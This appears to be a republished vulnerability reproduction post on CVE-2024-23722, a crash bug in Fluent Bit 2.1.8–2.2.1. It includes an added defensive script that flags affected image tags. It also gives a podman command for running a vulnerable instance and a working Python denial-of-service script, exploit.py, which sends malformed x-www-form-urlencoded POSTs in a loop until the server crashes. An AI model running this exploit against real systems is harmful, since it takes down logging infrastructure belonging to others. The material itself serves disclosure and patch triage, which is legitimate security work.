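Vulnerability description
In Fluent Bit 2.1.8 through 2.2.1, an invalid HTTP payload with the content type x-www-form-urlencoded can cause a NULL pointer dereference. The process crashes and does not restart.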
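For inventory triage, the following added example (not from the original post or the Fluent Bit project) flags container image references whose tag falls inside the affected range stated above, 2.1.8 through 2.2.1. The image-name pattern, the `registry.example.internal` entries and the sample inventory are constructed assumptions; only the first image reference appears on this page.

```python
import re

# Affected range as stated in the description above: 2.1.8 through 2.2.1 inclusive.
AFFECTED_MIN = (2, 1, 8)
AFFECTED_MAX = (2, 2, 1)

# Assumed naming: any repository path ending in "fluent-bit", optionally with a
# tag and/or digest, as in the podman command on this page.
_IMAGE_RE = re.compile(r"(?:^|/)fluent-bit(?::(?P<tag>[\w][\w.\-]*))?(?:@sha256:[0-9a-f]{64})?$")
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:[-_].*)?$")

def parse_version(tag):
    """Return (major, minor, patch) for tags like '2.2.0' or '2.2.0-debug', else None."""
    m = _VERSION_RE.match(tag or "")
    return tuple(int(x) for x in m.groups()) if m else None

def classify(image_ref):
    """Return 'affected', 'not-affected', 'unknown' or 'not-fluent-bit' for one reference."""
    m = _IMAGE_RE.search(image_ref.strip())
    if not m:
        return "not-fluent-bit"
    version = parse_version(m.group("tag"))
    if version is None:
        # Floating tags (latest, 2.2, no tag) and digest-only references cannot be
        # judged by name; the version of the running binary has to be checked instead.
        return "unknown"
    return "affected" if AFFECTED_MIN <= version <= AFFECTED_MAX else "not-affected"

def audit(image_refs):
    """Map each image reference to its classification."""
    return {ref: classify(ref) for ref in image_refs}

# Constructed inventory for illustration.
SAMPLE_INVENTORY = [
    "cr.fluentbit.io/fluent/fluent-bit:2.2.0",
    "cr.fluentbit.io/fluent/fluent-bit:2.1.7",
    "cr.fluentbit.io/fluent/fluent-bit:2.2.1-debug",
    "registry.example.internal/logging/fluent-bit:2.2.2",
    "registry.example.internal/logging/fluent-bit:latest",
    "docker.io/library/nginx:1.25.3",
]

if __name__ == "__main__":
    for ref, status in audit(SAMPLE_INVENTORY).items():
        print(f"{status:15} {ref}")
```

References reported as `unknown` need a direct version check on the host or container, since a floating tag says nothing about the build behind it.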
Asset mapping
FOFA:
Vulnerability reproduction
podman run -p8888:8888 -ti cr.fluentbit.io/fluent/fluent-bit:2.2.0 -t http -p port=8888 -o stdout
import requests
import time
import sys


def check_port(url):
    # Returns True if the HTTP input still accepts connections.
    try:
        with requests.head(url):
            return True
    except requests.exceptions.ConnectionError:
        return False


def send_request_every_second(url):
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = 'A'  # The body is now just the letter 'A'
    while True:
        if not check_port(url):
            print("port is currently not open")
            time.sleep(1)
            continue
        try:
            response = requests.post(url, headers=headers, data=data)
            # A normal HTTP response means the process survived the request.
            print(f"Status Code: {response.status_code}, Response: {response.text} server does not seem exploitable")
        except requests.exceptions.ConnectionError:
            print("Server might have crashed")
        time.sleep(1)  # Wait for 1 second before sending the next request


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: script.py <URL>")
    else:
        url = sys.argv[1]
        send_request_every_second(url)
python3 exploit.py http://127.0.0.1:8888
https://github.com/alexcote1/CVE-2024-23722-poc?tab=readme-ov-file
Originally published on the WeChat official account 漏洞文库: [Vulnerability Reproduction] CVE-2024-23722